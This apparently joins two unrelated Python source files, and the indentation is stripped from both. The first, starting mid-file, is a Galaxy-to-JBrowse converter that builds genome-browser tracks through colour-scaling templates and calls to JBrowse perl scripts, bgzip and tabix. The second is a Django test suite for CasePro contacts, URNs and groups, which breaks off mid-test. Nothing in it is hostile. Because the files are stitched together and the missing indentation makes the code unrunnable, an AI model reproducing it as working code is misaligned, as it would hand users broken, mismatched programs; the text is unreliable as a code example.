var red = parseInt(result[1], 16);
var green = parseInt(result[2], 16);
var blue = parseInt(result[3], 16);
if(isNaN(opacity) || opacity < 0){{ opacity = 0; }}
return 'rgba(' + red + ',' + green + ',' + blue + ',' + opacity + ')';
}}
"""
OPACITY_MATH = {
'linear': """
var opacity = (score - ({min})) / (({max}) - ({min}));
""",
'logarithmic': """
var opacity = (score - ({min})) / (({max}) - ({min}));
opacity = Math.log10(opacity) + Math.log10({max});
""",
'blast': """
var opacity = 0;
if(score == 0.0) {
opacity = 1;
} else{
opacity = (20 - Math.log10(score)) / 180;
}
"""
}
BREWER_COLOUR_IDX = 0
BREWER_COLOUR_SCHEMES = [
(166, 206, 227),
(31, 120, 180),
(178, 223, 138),
(51, 160, 44),
(251, 154, 153),
(227, 26, 28),
(253, 191, 111),
(255, 127, 0),
(202, 178, 214),
(106, 61, 154),
(255, 255, 153),
(177, 89, 40),
(228, 26, 28),
(55, 126, 184),
(77, 175, 74),
(152, 78, 163),
(255, 127, 0),
]
BREWER_DIVERGING_PALLETES = {
'BrBg': ("#543005", "#003c30"),
'PiYg': ("#8e0152", "#276419"),
'PRGn': ("#40004b", "#00441b"),
'PuOr': ("#7f3b08", "#2d004b"),
'RdBu': ("#67001f", "#053061"),
'RdGy': ("#67001f", "#1a1a1a"),
'RdYlBu': ("#a50026", "#313695"),
'RdYlGn': ("#a50026", "#006837"),
'Spectral': ("#9e0142", "#5e4fa2"),
}
def __init__(self):
self.brewer_colour_idx = 0
def rgb_from_hex(self, hexstr):
# http://stackoverflow.com/questions/4296249/how-do-i-convert-a-hex-triplet-to-an-rgb-tuple-and-back
return struct.unpack('BBB', codecs.decode(hexstr, 'hex'))
def min_max_gff(self, gff_file):
min_val = None
max_val = None
with open(gff_file, 'r') as handle:
for line in handle:
try:
value = float(line.split('\t')[5])
min_val = min(value, (min_val or value))
max_val = max(value, (max_val or value))
if value < min_val:
min_val = value
if value > max_val:
max_val = value
except Exception:
pass
return min_val, max_val
def hex_from_rgb(self, r, g, b):
return '#%02x%02x%02x' % (r, g, b)
def _get_colours(self):
r, g, b = self.BREWER_COLOUR_SCHEMES[self.brewer_colour_idx % len(self.BREWER_COLOUR_SCHEMES)]
self.brewer_colour_idx += 1
return r, g, b
def parse_menus(self, track):
trackConfig = {'menuTemplate': [{}, {}, {}, {}]}
if 'menu' in track['menus']:
menu_list = [track['menus']['menu']]
if isinstance(track['menus']['menu'], list):
menu_list = track['menus']['menu']
for m in menu_list:
tpl = {
'action': m['action'],
'label': m.get('label', '{name}'),
'iconClass': m.get('iconClass', 'dijitIconBookmark'),
}
if 'url' in m:
tpl['url'] = m['url']
if 'content' in m:
tpl['content'] = m['content']
if 'title' in m:
tpl['title'] = m['title']
trackConfig['menuTemplate'].append(tpl)
return trackConfig
def parse_colours(self, track, trackFormat, gff3=None):
# Wiggle tracks have a bicolor pallete
trackConfig = {'style': {}}
if trackFormat == 'wiggle':
trackConfig['style']['pos_color'] = track['wiggle']['color_pos']
trackConfig['style']['neg_color'] = track['wiggle']['color_neg']
if trackConfig['style']['pos_color'] == '__auto__':
trackConfig['style']['neg_color'] = self.hex_from_rgb(*self._get_colours())
trackConfig['style']['pos_color'] = self.hex_from_rgb(*self._get_colours())
# Wiggle tracks can change colour at a specified place
bc_pivot = track['wiggle']['bicolor_pivot']
if bc_pivot not in ('mean', 'zero'):
# The values are either one of those two strings
# or a number
bc_pivot = float(bc_pivot)
trackConfig['bicolor_pivot'] = bc_pivot
elif 'scaling' in track:
if track['scaling']['method'] == 'ignore':
if track['scaling']['scheme']['color'] != '__auto__':
trackConfig['style']['color'] = track['scaling']['scheme']['color']
else:
trackConfig['style']['color'] = self.hex_from_rgb(*self._get_colours())
else:
# Scored method
algo = track['scaling']['algo']
# linear, logarithmic, blast
scales = track['scaling']['scales']
# type __auto__, manual (min, max)
scheme = track['scaling']['scheme']
# scheme -> (type (opacity), color)
# ==================================
# GENE CALLS OR BLAST
# ==================================
if trackFormat == 'blast':
red, green, blue = self._get_colours()
color_function = self.COLOR_FUNCTION_TEMPLATE.format(**{
'score': "feature._parent.get('score')",
'opacity': self.OPACITY_MATH['blast'],
'red': red,
'green': green,
'blue': blue,
})
trackConfig['style']['color'] = color_function.replace('\n', '')
elif trackFormat == 'gene_calls':
# Default values, based on GFF3 spec
min_val = 0
max_val = 1000
# Get min/max and build a scoring function since JBrowse doesn't
if scales['type'] == 'automatic' or scales['type'] == '__auto__':
min_val, max_val = self.min_max_gff(gff3)
else:
min_val = scales.get('min', 0)
max_val = scales.get('max', 1000)
if scheme['color'] == '__auto__':
user_color = 'undefined'
auto_color = "'%s'" % self.hex_from_rgb(*self._get_colours())
elif scheme['color'].startswith('#'):
user_color = "'%s'" % self.hex_from_rgb(*self.rgb_from_hex(scheme['color'][1:]))
auto_color = 'undefined'
else:
user_color = 'undefined'
auto_color = "'%s'" % self.hex_from_rgb(*self._get_colours())
color_function = self.COLOR_FUNCTION_TEMPLATE_QUAL.format(**{
'opacity': self.OPACITY_MATH[algo].format(**{'max': max_val, 'min': min_val}),
'user_spec_color': user_color,
'auto_gen_color': auto_color,
})
trackConfig['style']['color'] = color_function.replace('\n', '')
return trackConfig
def etree_to_dict(t):
d = {t.tag: {} if t.attrib else None}
children = list(t)
if children:
dd = defaultdict(list)
for dc in map(etree_to_dict, children):
for k, v in dc.items():
dd[k].append(v)
d = {t.tag: {k: v[0] if len(v) == 1 else v for k, v in dd.items()}}
if t.attrib:
d[t.tag].update(('@' + k, v) for k, v in t.attrib.items())
if t.text:
text = t.text.strip()
if children or t.attrib:
if text:
d[t.tag]['#text'] = text
else:
d[t.tag] = text
return d
# score comes from feature._parent.get('score') or feature.get('score')
INSTALLED_TO = os.path.dirname(os.path.realpath(__file__))
class JbrowseConnector(object):
def __init__(self, jbrowse, outdir, genomes, standalone=False, gencode=1):
self.TN_TABLE = {
'gff3': '--gff',
'gff': '--gff',
'bed': '--bed',
'genbank': '--gbk',
}
self.cs = ColorScaling()
self.jbrowse = jbrowse
self.outdir = outdir
self.genome_paths = genomes
self.standalone = standalone
self.gencode = gencode
self.tracksToIndex = []
if standalone:
self.clone_jbrowse(self.jbrowse, self.outdir)
else:
try:
os.makedirs(self.outdir)
except OSError:
# Ignore if the folder exists
pass
self.process_genomes()
self.update_gencode()
def update_gencode(self):
table = CodonTable.unambiguous_dna_by_id[int(self.gencode)]
trackList = os.path.join(self.outdir, 'data', 'trackList.json')
with open(trackList, 'r') as handle:
trackListData = json.load(handle)
trackListData['tracks'][0].update({
'codonStarts': table.start_codons,
'codonStops': table.stop_codons,
'codonTable': table.forward_table,
})
with open(trackList, 'w') as handle:
json.dump(trackListData, handle, indent=2)
def subprocess_check_call(self, command):
log.debug('cd %s && %s', self.outdir, ' '.join(command))
subprocess.check_call(command, cwd=self.outdir)
def _jbrowse_bin(self, command):
return os.path.realpath(os.path.join(self.jbrowse, 'bin', command))
def process_genomes(self):
for genome_path in self.genome_paths:
self.subprocess_check_call([
'perl', self._jbrowse_bin('prepare-refseqs.pl'),
'--fasta', genome_path])
def generate_names(self):
# Generate names
args = [
'perl', self._jbrowse_bin('generate-names.pl'),
'--hashBits', '16'
]
tracks = ','.join(self.tracksToIndex)
if tracks:
args += ['--tracks', tracks]
else:
# No tracks to index, index only the refseq
args += ['--tracks', 'DNA']
self.subprocess_check_call(args)
def _add_json(self, json_data):
cmd = [
'perl', self._jbrowse_bin('add-json.pl'),
json.dumps(json_data),
os.path.join('data', 'trackList.json')
]
self.subprocess_check_call(cmd)
def _add_track_json(self, json_data):
if len(json_data) == 0:
return
tmp = tempfile.NamedTemporaryFile(delete=False)
tmp.write(json.dumps(json_data))
tmp.close()
cmd = ['perl', self._jbrowse_bin('add-track-json.pl'), tmp.name,
os.path.join('data', 'trackList.json')]
self.subprocess_check_call(cmd)
os.unlink(tmp.name)
def _blastxml_to_gff3(self, xml, min_gap=10):
gff3_unrebased = tempfile.NamedTemporaryFile(delete=False)
cmd = ['python', os.path.join(INSTALLED_TO, 'blastxml_to_gapped_gff3.py'),
'--trim', '--trim_end', '--min_gap', str(min_gap), xml]
log.debug('cd %s && %s > %s', self.outdir, ' '.join(cmd), gff3_unrebased.name)
subprocess.check_call(cmd, cwd=self.outdir, stdout=gff3_unrebased)
gff3_unrebased.close()
return gff3_unrebased.name
def add_blastxml(self, data, trackData, blastOpts, **kwargs):
gff3 = self._blastxml_to_gff3(data, min_gap=blastOpts['min_gap'])
if 'parent' in blastOpts and blastOpts['parent'] != 'None':
gff3_rebased = tempfile.NamedTemporaryFile(delete=False)
cmd = ['python', os.path.join(INSTALLED_TO, 'gff3_rebase.py')]
if blastOpts.get('protein', 'false') == 'true':
cmd.append('--protein2dna')
cmd.extend([os.path.realpath(blastOpts['parent']), gff3])
log.debug('cd %s && %s > %s', self.outdir, ' '.join(cmd), gff3_rebased.name)
subprocess.check_call(cmd, cwd=self.outdir, stdout=gff3_rebased)
gff3_rebased.close()
# Replace original gff3 file
shutil.copy(gff3_rebased.name, gff3)
os.unlink(gff3_rebased.name)
config = {
'glyph': 'JBrowse/View/FeatureGlyph/Segments',
"category": trackData['category'],
}
clientConfig = trackData['style']
cmd = ['perl', self._jbrowse_bin('flatfile-to-json.pl'),
'--gff', gff3,
'--trackLabel', trackData['label'],
'--key', trackData['key'],
'--clientConfig', json.dumps(clientConfig),
'--config', json.dumps(config),
'--trackType', 'JBrowse/View/Track/CanvasFeatures'
]
# className in --clientConfig is ignored, it needs to be set with --className
if 'className' in trackData['style']:
cmd += ['--className', trackData['style']['className']]
self.subprocess_check_call(cmd)
os.unlink(gff3)
if blastOpts.get('index', 'false') == 'true':
self.tracksToIndex.append("%s" % trackData['label'])
def add_bigwig(self, data, trackData, wiggleOpts, **kwargs):
dest = os.path.join('data', 'raw', trackData['label'] + '.bw')
cmd = ['ln', data, dest]
self.subprocess_check_call(cmd)
url = os.path.join('raw', trackData['label'] + '.bw')
trackData.update({
"urlTemplate": url,
"storeClass": "JBrowse/Store/SeqFeature/BigWig",
"type": "JBrowse/View/Track/Wiggle/Density",
})
trackData['type'] = wiggleOpts['type']
trackData['variance_band'] = True if wiggleOpts['variance_band'] == 'true' else False
if 'min' in wiggleOpts and 'max' in wiggleOpts:
trackData['min_score'] = wiggleOpts['min']
trackData['max_score'] = wiggleOpts['max']
else:
trackData['autoscale'] = wiggleOpts.get('autoscale', 'local')
self._add_track_json(trackData)
def add_bam(self, data, trackData, bamOpts, bam_index=None, **kwargs):
dest = os.path.join('data', 'raw', trackData['label'] + '.bam')
cmd = ['ln', '-s', os.path.realpath(data), dest]
self.subprocess_check_call(cmd)
cmd = ['ln', '-s', os.path.realpath(bam_index), dest + '.bai']
self.subprocess_check_call(cmd)
url = os.path.join('raw', trackData['label'] + '.bam')
trackData.update({
"urlTemplate": url,
"type": "JBrowse/View/Track/Alignments2",
"storeClass": "JBrowse/Store/SeqFeature/BAM",
})
self._add_track_json(trackData)
if bamOpts.get('auto_snp', 'false') == 'true':
trackData2 = copy.copy(trackData)
trackData2.update({
"type": "JBrowse/View/Track/SNPCoverage",
"key": trackData['key'] + " - SNPs/Coverage",
"label": trackData['label'] + "_autosnp",
})
self._add_track_json(trackData2)
def add_vcf(self, data, trackData, vcfOpts={}, **kwargs):
dest = os.path.join('data', 'raw', trackData['label'] + '.vcf')
# ln?
cmd = ['ln', '-s', data, dest]
self.subprocess_check_call(cmd)
cmd = ['bgzip', dest]
self.subprocess_check_call(cmd)
cmd = ['tabix', '-p', 'vcf', dest + '.gz']
self.subprocess_check_call(cmd)
url = os.path.join('raw', trackData['label'] + '.vcf')
trackData.update({
"urlTemplate": url,
"type": "JBrowse/View/Track/HTMLVariants",
"storeClass": "JBrowse/Store/SeqFeature/VCFTabix",
})
self._add_track_json(trackData)
def add_features(self, data, format, trackData, gffOpts, **kwargs):
cmd = [
'perl', self._jbrowse_bin('flatfile-to-json.pl'),
self.TN_TABLE.get(format, 'gff'),
data,
'--trackLabel', trackData['label'],
'--key', trackData['key']
]
# className in --clientConfig is ignored, it needs to be set with --className
if 'className' in trackData['style']:
cmd += ['--className', trackData['style']['className']]
config = copy.copy(trackData)
clientConfig = trackData['style']
del config['style']
if 'match' in gffOpts:
config['glyph'] = 'JBrowse/View/FeatureGlyph/Segments'
cmd += ['--type', gffOpts['match']]
cmd += ['--clientConfig', json.dumps(clientConfig),
]
trackType = 'JBrowse/View/Track/CanvasFeatures'
if 'trackType' in gffOpts:
trackType = gffOpts['trackType']
if trackType == 'JBrowse/View/Track/CanvasFeatures':
if 'transcriptType' in gffOpts and gffOpts['transcriptType']:
config['transcriptType'] = gffOpts['transcriptType']
if 'subParts' in gffOpts and gffOpts['subParts']:
config['subParts'] = gffOpts['subParts']
if 'impliedUTRs' in gffOpts and gffOpts['impliedUTRs']:
config['impliedUTRs'] = gffOpts['impliedUTRs']
elif trackType == 'JBrowse/View/Track/HTMLFeatures':
if 'transcriptType' in gffOpts and gffOpts['transcriptType']:
cmd += ['--type', gffOpts['transcriptType']]
cmd += [
'--trackType', gffOpts['trackType']
]
cmd.extend(['--config', json.dumps(config)])
self.subprocess_check_call(cmd)
if gffOpts.get('index', 'false') == 'true':
self.tracksToIndex.append("%s" % trackData['label'])
def process_annotations(self, track):
outputTrackConfig = {
'style': {
'label': track['style'].get('label', 'description'),
'className': track['style'].get('className', 'feature'),
'description': track['style'].get('description', ''),
},
'category': track['category'],
}
for i, (dataset_path, dataset_ext, track_human_label) in enumerate(track['trackfiles']):
log.info('Processing %s / %s', track['category'], track_human_label)
outputTrackConfig['key'] = track_human_label
hashData = [dataset_path, track_human_label, track['category']]
outputTrackConfig['label'] = hashlib.md5('|'.join(hashData).encode('utf-8')).hexdigest() + '_%s' % i
# Colour parsing is complex due to different track types having
# different colour options.
colourOptions = self.cs.parse_colours(track['conf']['options'], track['format'], gff3=dataset_path)
# This used to be done with a dict.update() call, however that wiped out any previous style settings...
for key in colourOptions:
if key == 'style':
for subkey in colourOptions['style']:
outputTrackConfig['style'][subkey] = colourOptions['style'][subkey]
else:
outputTrackConfig[key] = colourOptions[key]
if 'menus' in track['conf']['options']:
menus = self.cs.parse_menus(track['conf']['options'])
outputTrackConfig.update(menus)
# import pprint; pprint.pprint(track)
# import sys; sys.exit()
if dataset_ext in ('gff', 'gff3', 'bed'):
self.add_features(dataset_path, dataset_ext, outputTrackConfig,
track['conf']['options']['gff'])
elif dataset_ext == 'bigwig':
self.add_bigwig(dataset_path, outputTrackConfig,
track['conf']['options']['wiggle'])
elif dataset_ext == 'bam':
real_indexes = track['conf']['options']['pileup']['bam_indices']['bam_index']
if not isinstance(real_indexes, list):
# <bam_indices>
# <bam_index>/path/to/a.bam.bai</bam_index>
# </bam_indices>
#
# The above will result in the 'bam_index' key containing a
# string. If there are two or more indices, the container
# becomes a list. Fun!
real_indexes = [real_indexes]
self.add_bam(dataset_path, outputTrackConfig,
track['conf']['options']['pileup'],
bam_index=real_indexes[i])
elif dataset_ext == 'blastxml':
self.add_blastxml(dataset_path, outputTrackConfig, track['conf']['options']['blast'])
elif dataset_ext == 'vcf':
self.add_vcf(dataset_path, outputTrackConfig)
# Return non-human label for use in other fields
yield outputTrackConfig['label']
def add_final_data(self, data):
viz_data = {}
if len(data['visibility']['default_on']) > 0:
viz_data['defaultTracks'] = ','.join(data['visibility']['default_on'])
if len(data['visibility']['always']) > 0:
viz_data['alwaysOnTracks'] = ','.join(data['visibility']['always'])
if len(data['visibility']['force']) > 0:
viz_data['forceTracks'] = ','.join(data['visibility']['force'])
generalData = {}
if data['general']['aboutDescription'] is not None:
generalData['aboutThisBrowser'] = {'description': data['general']['aboutDescription'].strip()}
generalData['view'] = {
'trackPadding': data['general']['trackPadding']
}
generalData['shareLink'] = (data['general']['shareLink'] == 'true')
generalData['show_tracklist'] = (data['general']['show_tracklist'] == 'true')
generalData['show_nav'] = (data['general']['show_nav'] == 'true')
generalData['show_overview'] = (data['general']['show_overview'] == 'true')
generalData['show_menu'] = (data['general']['show_menu'] == 'true')
generalData['hideGenomeOptions'] = (data['general']['hideGenomeOptions'] == 'true')
viz_data.update(generalData)
self._add_json(viz_data)
def clone_jbrowse(self, jbrowse_dir, destination):
"""Clone a JBrowse directory into a destination directory.
"""
# JBrowse seems to have included some bad symlinks, cp ignores bad symlinks
# unlike copytree
cmd = ['cp', '-r', os.path.join(jbrowse_dir, '.'), destination]
log.debug(' '.join(cmd))
subprocess.check_call(cmd)
cmd = ['mkdir', '-p', os.path.join(destination, 'data', 'raw')]
log.debug(' '.join(cmd))
subprocess.check_call(cmd)
# http://unix.stackexchange.com/a/38691/22785
# JBrowse releases come with some broken symlinks
cmd = ['find', destination, '-type', 'l', '-xtype', 'l', '-exec', 'rm', "'{}'", '+']
log.debug(' '.join(cmd))
subprocess.check_call(cmd)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="", epilog="")
parser.add_argument('xml', type=argparse.FileType('r'), help='Track Configuration')
parser.add_argument('--jbrowse', help='Folder containing a jbrowse release')
parser.add_argument('--outdir', help='Output directory', default='out')
parser.add_argument('--standalone', help='Standalone mode includes a copy of JBrowse', action='store_true')
args = parser.parse_args()
tree = ET.parse(args.xml.name)
root = tree.getroot()
jc = JbrowseConnector(
jbrowse=args.jbrowse,
outdir=args.outdir,
genomes=[os.path.realpath(x.text) for x in root.findall('metadata/genomes/genome')],
standalone=args.standalone,
gencode=root.find('metadata/gencode').text
)
extra_data = {
'visibility': {
'default_on': [],
'default_off': [],
'force': [],
'always': [],
},
'general': {
'defaultLocation': root.find('metadata/general/defaultLocation').text,
'trackPadding': int(root.find('metadata/general/trackPadding').text),
'shareLink': root.find('metadata/general/shareLink').text,
'aboutDescription': root.find('metadata/general/aboutDescription').text,
'show_tracklist': root.find('metadata/general/show_tracklist').text,
'show_nav': root.find('metadata/general/show_nav').text,
'show_overview': root.find('metadata/general/show_overview').text,
'show_menu': root.find('metadata/general/show_menu').text,
'hideGenomeOptions': root.find('metadata/general/hideGenomeOptions').text,
}
}
for track in root.findall('tracks/track'):
track_conf = {}
track_conf['trackfiles'] = [
(os.path.realpath(x.attrib['path']), x.attrib['ext'], x.attrib['label'])
for x in track.findall('files/trackFile')
]
track_conf['category'] = track.attrib['cat']
track_conf['format'] = track.attrib['format']
try:
# Only pertains to gff3 + blastxml. TODO?
track_conf['style'] = {t.tag: t.text for t in track.find('options/style')}
except TypeError:
track_conf['style'] = {}
pass
track_conf['conf'] = etree_to_dict(track.find('options'))
keys = jc.process_annotations(track_conf)
for key in keys:
extra_data['visibility'][track.attrib.get('visibility', 'default_off')].append(key)
jc.add_final_data(extra_data)
jc.generate_names()
| |
from dash.orgs.models import TaskState
from django.urls import reverse
from django.test.utils import override_settings
from unittest.mock import patch
from casepro.test import BaseCasesTest
from .models import URN, Contact, Field, Group, InvalidURN
from .tasks import pull_contacts
class URNTest(BaseCasesTest):
def test_from_parts(self):
self.assertEqual(URN.from_parts("tel", "12345"), "tel:12345")
self.assertEqual(URN.from_parts("tel", "+12345"), "tel:+12345")
self.assertEqual(URN.from_parts("tel", "(917) 992-5253"), "tel:(917) 992-5253")
self.assertEqual(URN.from_parts("mailto", "a_b+c@d.com"), "mailto:a_b+c@d.com")
self.assertRaises(ValueError, URN.from_parts, "", "12345")
self.assertRaises(ValueError, URN.from_parts, "tel", "")
self.assertRaises(ValueError, URN.from_parts, "xxx", "12345")
def test_to_parts(self):
self.assertEqual(URN.to_parts("tel:12345"), ("tel", "12345"))
self.assertEqual(URN.to_parts("tel:+12345"), ("tel", "+12345"))
self.assertEqual(URN.to_parts("twitter:abc_123"), ("twitter", "abc_123"))
self.assertEqual(URN.to_parts("mailto:a_b+c@d.com"), ("mailto", "a_b+c@d.com"))
self.assertRaises(ValueError, URN.to_parts, "tel")
self.assertRaises(ValueError, URN.to_parts, "tel:") # missing scheme
self.assertRaises(ValueError, URN.to_parts, ":12345") # missing path
self.assertRaises(ValueError, URN.to_parts, "x_y:123") # invalid scheme
self.assertRaises(ValueError, URN.to_parts, "xyz:{abc}") # invalid path
def test_normalize(self):
# valid tel numbers
self.assertEqual(URN.normalize("tel: +250788383383 "), "tel:+250788383383")
self.assertEqual(URN.normalize("tel:+1(917)992-5253"), "tel:+19179925253")
self.assertEqual(URN.normalize("tel:250788383383"), "tel:+250788383383")
# un-normalizable tel numbers
self.assertEqual(URN.normalize("tel:12345"), "tel:12345")
self.assertEqual(URN.normalize("tel:0788383383"), "tel:0788383383")
self.assertEqual(URN.normalize("tel:MTN"), "tel:mtn")
# twitter handles remove @
self.assertEqual(URN.normalize("twitter: @jimmyJO"), "twitter:jimmyjo")
# email addresses
self.assertEqual(URN.normalize("mailto: nAme@domAIN.cOm "), "mailto:name@domain.com")
def test_validate(self):
self.assertTrue(URN.validate("tel:+27825552233"))
self.assertRaises(InvalidURN, URN.validate, "tel:0825550011")
self.assertTrue(URN.validate("unknown_scheme:address_for_unknown_scheme"))
def test_validate_phone(self):
self.assertRaises(InvalidURN, URN.validate_phone, "0825550011") # lacks country code
self.assertRaises(InvalidURN, URN.validate_phone, "(+27)825550011") # incorrect format (E.123)
self.assertRaises(InvalidURN, URN.validate_phone, "+278255500abc") # incorrect format
self.assertRaises(InvalidURN, URN.validate_phone, "+278255500115555555") # too long
self.assertTrue(URN.validate_phone("+27825552233"))
class ContactTest(BaseCasesTest):
def setUp(self):
super(ContactTest, self).setUp()
self.ann = self.create_contact(
self.unicef, "7b7dd838-4947-4e85-9b5c-0e8b1794080b", "Ann", [self.reporters], {"age": "32", "state": "WA"}
)
def test_save(self):
# start with no data
Contact.objects.all().delete()
Group.objects.all().delete()
Field.objects.all().delete()
contact = Contact.objects.create(
org=self.unicef,
uuid="C-001",
name="Bob McFlow",
language="eng",
is_stub=False,
fields={"age": "34"},
__data__groups=[("G-001", "Customers")],
urns=["tel:0821234567"],
)
self.assertEqual(contact.uuid, "C-001")
self.assertEqual(contact.name, "Bob McFlow")
self.assertEqual(contact.language, "eng")
self.assertEqual(contact.get_fields(), {"age": "34"})
self.assertEqual(contact.urns, ["tel:0821234567"])
customers = Group.objects.get(org=self.unicef, uuid="G-001", name="Customers")
self.assertEqual(set(contact.groups.all()), {customers})
contact = Contact.objects.select_related("org").prefetch_related("groups").get(uuid="C-001")
# check there are no extra db hits when saving without change, assuming appropriate pre-fetches (as above)
with self.assertNumQueries(1):
setattr(contact, "__data__groups", [("G-001", "Customers")])
contact.save()
# check removing a group and adding new ones
with self.assertNumQueries(7):
setattr(contact, "__data__groups", [("G-002", "Spammers"), ("G-003", "Boffins")])
contact.save()
contact = Contact.objects.get(uuid="C-001")
spammers = Group.objects.get(org=self.unicef, uuid="G-002", name="Spammers")
boffins = Group.objects.get(org=self.unicef, uuid="G-003", name="Boffins")
self.assertEqual(set(contact.groups.all()), {spammers, boffins})
def test_get_display(self):
# if the site uses 'uuid' for the display
with override_settings(SITE_CONTACT_DISPLAY="uuid"):
self.assertEqual(self.ann.get_display(), "7B7DD8")
# if the site uses 'urns' for the display
self.ann.urns = ["tel:+2345"]
with override_settings(SITE_CONTACT_DISPLAY="urns"):
self.assertEqual(self.ann.get_display(), "+2345")
self.ann.refresh_from_db()
# if the site uses 'name' or something unrecognised for the display
self.assertEqual(self.ann.get_display(), "Ann")
self.ann.name = None
self.assertEqual(self.ann.get_display(), "---")
def test_get_fields(self):
self.assertEqual(self.ann.get_fields(), {"age": "32", "state": "WA"}) # what is stored on the contact
self.assertEqual(self.ann.get_fields(visible=True), {"nickname": None, "age": "32"}) # visible fields
def test_release(self):
self.create_message(self.unicef, 101, self.ann, "Hello")
self.create_message(self.unicef, 102, self.ann, "Goodbye")
self.ann.release()
self.assertEqual(self.ann.groups.count(), 0) # should be removed from groups
self.assertEqual(self.ann.incoming_messages.count(), 2) # messages should be inactive and handled
self.assertEqual(self.ann.incoming_messages.filter(is_active=False, is_handled=True).count(), 2)
def test_as_json(self):
self.assertEqual(self.ann.as_json(full=False), {"id": self.ann.pk, "display": "Ann"})
# full=True means include visible contact fields and laanguage etc
self.assertEqual(
self.ann.as_json(full=True),
{
"id": self.ann.pk,
"display": "Ann",
"name": "Ann",
"urns": [],
"language": {"code": "eng", "name": "English"},
"groups": [{"id": self.reporters.pk, "name": "Reporters"}],
"fields": {"nickname": None, "age": "32"},
"blocked": False,
"stopped": False,
},
)
self.ann.language = None
self.ann.urns = ["tel:+2345678", "mailto:ann@test.com"]
self.ann.save()
self.assertEqual(
self.ann.as_json(full=True),
{
"id": self.ann.pk,
"display": "Ann",
"name": "Ann",
"urns": ["tel:+2345678", "mailto:ann@test.com"],
"language": None,
"groups": [{"id": self.reporters.pk, "name": "Reporters"}],
"fields": {"nickname": None, "age": "32"},
"blocked": False,
"stopped": False,
},
)
# If the urns and name fields are hidden they should not be returned
# SITE_CONTACT_DISPLAY overrules this for the 'display' attr
with override_settings(SITE_HIDE_CONTACT_FIELDS=["urns", "name"], SITE_CONTACT_DISPLAY="uuid"):
self.assertEqual(
self.ann.as_json(full=True),
{
"id": self.ann.pk,
"display": "7B7DD8",
"urns": [],
"name": None,
"language": None,
"groups": [{"id": self.reporters.pk, "name": "Reporters"}],
"fields": {"nickname": None, "age": "32"},
"blocked": False,
"stopped": False,
},
)
@patch("casepro.test.TestBackend.push_contact")
def test_get_or_create_from_urn(self, mock_push_contact):
"""
If no contact with a matching urn exists a new one should be created
"""
Contact.objects.all().delete()
# try with a URN that doesn't match an existing contact
contact1 = Contact.get_or_create_from_urn(self.unicef, "tel:+27827654321")
self.assertEqual(contact1.urns, ["tel:+27827654321"])
self.assertIsNone(contact1.name)
self.assertIsNone(contact1.uuid)
# check that the backend was updated
self.assertTrue(mock_push_contact.called)
mock_push_contact.reset_mock()
# try with a URN that does match an existing contact
contact2 = Contact.get_or_create_from_urn(self.unicef, "tel:+27827654321")
self.assertEqual(contact2, contact1)
# we shouldn't update the backend because a contact wasn't created
self.assertFalse(mock_push_contact.called)
# URN will be normalized
contact3 = Contact.get_or_create_from_urn(self.unicef, "tel:+(278)-2765-4321")
self.assertEqual(contact3, contact1)
# we shouldn't update the backend because a contact wasn't created
self.assertFalse(mock_push_contact.called)
# we get an exception if URN isn't valid (e.g. local number)
self.assertRaises(InvalidURN, Contact.get_or_create_from_urn, self.unicef, "tel:0827654321")
class ContactCRUDLTest(BaseCasesTest):
def setUp(self):
super(ContactCRUDLTest, self).setUp()
self.ann = self.create_contact(self.unicef, "C-001", "Ann", [self.reporters], {"age": "32"})
def test_list(self):
url = reverse("contacts.contact_list")
# log in as a non-superuser
self.login(self.admin)
response = self.url_get("unicef", url)
self.assertEqual(response.status_code, 302)
self.login(self.superuser)
response = self.url_get("unicef", url)
self.assertEqual(response.status_code, 200)
self.assertEqual(list(response.context["object_list"]), [self.ann])
def test_read(self):
url = reverse("contacts.contact_read", args=[self.ann.pk])
# log in as regular user
self.login(self.user1)
response = self.url_get("unicef", url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "View External")
# administrators get button linking to backend
self.login(self.admin)
response = self.url_get("unicef", url)
self.assertContains(response, "View External")
# users from other orgs get nothing
self.login(self.user4)
response = self.url_get("unicef", url)
self.assertLoginRedirect(response, url)
def test_fetch(self):
url = reverse("contacts.contact_fetch", args=[self.ann.pk])
# log in as regular user
self.login(self.user1)
response = self.url_get("unicef", url)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.json,
{
"id": self.ann.pk,
"display": "Ann",
"name": "Ann",
"urns": [],
"language": {"code": "eng", "name": "English"},
"fields": {"age": "32", "nickname": None},
"groups": [{"id": self.reporters.pk, "name": "Reporters"}],
"blocked": False,
"stopped": False,
},
)
def test_cases(self):
url = reverse("contacts.contact_cases", args=[self.ann.pk])
msg1 = self.create_message(self.unicef, 101, self.ann, "What is tea?")
case1 = self.create_case(self.unicef, self.ann, self.moh, msg1, [])
case1.close(self.admin)
msg2 = self.create_message(self.unicef, 102, self.ann, "I'm pregnant")
case2 = self.create_case(self.unicef, self.ann, self.moh, msg2, [self.pregnancy, self.aids])
# log in as admin
self.login(self.admin)
# should see all cases in reverse chronological order
response = self.url_get("unicef", url)
self.assertEqual([c["id"] for c in response.json["results"]], [case2.pk, case1.pk])
self.login(self.user1)
# should see both cases because of assignment/labels
response = self.url_get("unicef", url)
self.assertEqual([c["id"] for c in response.json["results"]], [case2.pk, case1.pk])
self.login(self.user3)
# should see only case with pregnancy label
response = self.url_get("unicef", url)
self.assertEqual([c["id"] for c in response.json["results"]], [case2.pk])
class FieldCRUDLTest(BaseCasesTest):
def test_list(self):
url = reverse("contacts.field_list")
# partner users can't access this
self.login(self.user1)
response = self.url_get("unicef", url)
self.assertLoginRedirect(response, url)
# org admins can
self.login(self.admin)
response = self.url_get("unicef", url)
self.assertEqual(list(response.context["object_list"]), [self.age, self.nickname, self.state])
class GroupTest(BaseCasesTest):
def test_model(self):
invisible = self.create_group(self.unicef, "G-006", "Invisible", count=12, is_visible=False)
self.assertEqual(
set(Group.get_all(self.unicef)), {self.males, self.females, self.reporters, self.registered, invisible}
)
self.assertEqual(set(Group.get_all(self.unicef, visible=True)), {self.males, self.females, self.registered})
self.assertEqual(
set(Group.get_all(self.unicef, dynamic=False)), {self.males, self.females, self.reporters, invisible}
)
self.assertEqual(
invisible.as_json(full=True), {"id": invisible.pk, "name": "Invisible", "count": 12, "is_dynamic": False}
)
self.assertEqual(invisible.as_json(full=False), {"id": invisible.pk, "name": "Invisible"})
class GroupCRUDLTest(BaseCasesTest):
def test_list(self):
url = reverse("contacts.group_list")
# partner users can't access this
self.login(self.user1)
response = self.url_get("unicef", url)
self.assertLoginRedirect(response, url)
# org admins can
self.login(self.admin)
response = self.url_get("unicef", url)
